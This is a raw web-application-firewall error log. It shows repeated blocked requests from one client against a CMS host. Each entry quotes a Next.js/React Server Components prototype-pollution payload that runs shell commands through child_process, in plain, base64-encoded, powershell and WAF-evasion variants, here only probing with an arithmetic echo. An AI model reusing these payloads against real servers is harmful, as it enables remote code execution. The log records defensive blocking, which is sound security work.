ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync(Buffer.from('ZWNobyAkKCg0MSoyNzEpKQ==','base64').toString()).toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x2..."] [sever [hostname "cms.dev-unit.com"] [uri "/settings"] [unique_id "adJm1Zc83uMXRUE9zvQTaQAAAcg"] [Sun Apr 05 15:42:45.126025 2026] [:error] [pid 23077:tid 23096] [client 172.94.9.253:46340] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22$K4\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:const..."] [sever [hostname "cms.dev-unit.com"] [uri "/users"] [unique_id "adJm1Zc83uMXRUE9zvQTagAAAc0"] [Sun Apr 05 15:42:45.130516 2026] [:error] [pid 13019:tid 13264] [client 172.94.9.253:46420] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('powershell -c \\x2241*271\\x22').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\..."] [sever [hostname "cms.dev-unit.com"] [uri "/users"] [unique_id "adJm1bxQSOrq_iRTM7dqpAAAARg"] [Sun Apr 05 15:42:45.140346 2026] [:error] [pid 13019:tid 13262] [client 172.94.9.253:46406] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\..."] [sever [hostname "cms.dev-unit.com"] [uri "/account"] [unique_id "adJm1bxQSOrq_iRTM7dqpQAAARY"] [Sun Apr 05 15:42:45.140350 2026] [:error] [pid 23077:tid 23088] [client 172.94.9.253:46384] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var r=process.mainModule.require('child_process').spawnSync('sh',['-c','echo $((41*271))']);var res=r.stdout.toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22..."] [sever [hostname "cms.dev-unit.com"] [uri "/users"] [unique_id "adJm1Zc83uMXRUE9zvQTbAAAAcU"] [Sun Apr 05 15:42:45.140754 2026] [:error] [pid 1503:tid 1515] [client 172.94.9.253:46430] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var/*bypass*/res=process.mainModule.require(/*waf*/'child_process'/*bypass*/).execSync('echo $((41*271))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_f..."] [sever [hostname "cms.dev-unit.com"] [uri "/users"] [unique_id "adJm1UI7AjfUQYCN-J7D4wAAAMY"] [Sun Apr 05 15:42:45.140957 2026] [:error] [pid 31198:tid 31257] [client 172.94.9.253:46400] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\..."] [sever [hostname "cms.dev-unit.com"] [uri "/user"] [unique_id "adJm1TT5TgrBR8xRnfXBKwAAAUU"] [Sun Apr 05 15:42:45.142182 2026] [:error] [pid 13019:tid 13242] [client 172.94.9.253:46356] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\..."] [sever [hostname "cms.dev-unit.com"] [uri "/user"] [unique_id "adJm1bxQSOrq_iRTM7dqpgAAAQI"] [Sun Apr 05 15:42:45.211841 2026] [:error] [pid 23077:tid 23089] [client 172.94.9.253:46370] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\..."] [sever [hostname "cms.dev-unit.com"] [uri "/signup"] [unique_id "adJm1Zc83uMXRUE9zvQTawAAAcY"] [Sun Apr 05 15:42:45.215272 2026] [:error] [pid 31198:tid 31268] [client 172.94.9.253:46488] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var r=process.mainModule.require('child_process').spawnSync('sh',['-c','echo $((41*271))']);var res=r.stdout.toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22..."] [sever [hostname "cms.dev-unit.com"] [uri "/user"] [unique_id "adJm1TT5TgrBR8xRnfXBLAAAAVA"] [Sun Apr 05 15:42:45.217807 2026] [:error] [pid 23077:tid 23107] [client 172.94.9.253:46482] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\..."] [sever [hostname "cms.dev-unit.com"] [uri "/home"] [unique_id "adJm1Zc83uMXRUE9zvQTbgAAAdg"] [Sun Apr 05 15:42:45.217826 2026] [:error] [pid 1308:tid 1344] [client 172.94.9.253:46468] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\..."] [sever [hostname "cms.dev-unit.com"] [uri "/home"] [unique_id "adJm1Sj-HYEhJWFlG6ErhwAAAEA"] [Sun Apr 05 15:42:45.250258 2026] [:error] [pid 23077:tid 23084] [client 172.94.9.253:46452] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\..."] [sever [hostname "cms.dev-unit.com"] [uri "/contact"] [unique_id "adJm1Zc83uMXRUE9zvQTbwAAAcE"] [Sun Apr 05 15:42:45.268010 2026] [:error] [pid 13019:tid 13246] [client 172.94.9.253:46542] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync(Buffer.from('ZWNobyAkKCg0MSoyNzEpKQ==','base64').toString()).toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x2..."] [sever [hostname "cms.dev-unit.com"] [uri "/posts"] [unique_id "adJm1bxQSOrq_iRTM7dqqQAAAQY"] [Sun Apr 05 15:42:45.268175 2026] [:error] [pid 13019:tid 13262] [client 172.94.9.253:46504] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22$K4\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:const..."] [sever [hostname "cms.dev-unit.com"] [uri "/user"] [unique_id "adJm1bxQSOrq_iRTM7dqqgAAARY"] [Sun Apr 05 15:42:45.268573 2026] [:error] [pid 13019:tid 13254] [client 172.94.9.253:46436] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\..."] [sever [hostname "cms.dev-unit.com"] [uri "/api/auth/callback"] [unique_id "adJm1bxQSOrq_iRTM7dqqAAAAQ4"] [Sun Apr 05 15:42:45.271347 2026] [:error] [pid 13019:tid 13242] [client 172.94.9.253:46520] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\..."] [sever [hostname "cms.dev-unit.com"] [uri "/post"] [unique_id "adJm1bxQSOrq_iRTM7dqqwAAAQI"] [Sun Apr 05 15:42:45.286425 2026] [:error] [pid 1308:tid 1354] [client 172.94.9.253:46534] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\..."] [sever [hostname "cms.dev-unit.com"] [uri "/users"] [unique_id "adJm1Sj-HYEhJWFlG6EriAAAAEk"] [Sun Apr 05 15:42:45.332549 2026] [:error] [pid 13019:tid 13264] [client 172.94.9.253:46590] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var r=process.mainModule.require('child_process').spawnSync('sh',['-c','echo $((41*271))']);var res=r.stdout.toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22..."] [sever [hostname "cms.dev-unit.com"] [uri "/profile"] [unique_id "adJm1bxQSOrq_iRTM7dqrQAAARg"] [Sun Apr 05 15:42:45.332646 2026] [:error] [pid 31198:tid 31276] [client 172.94.9.253:46618] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match 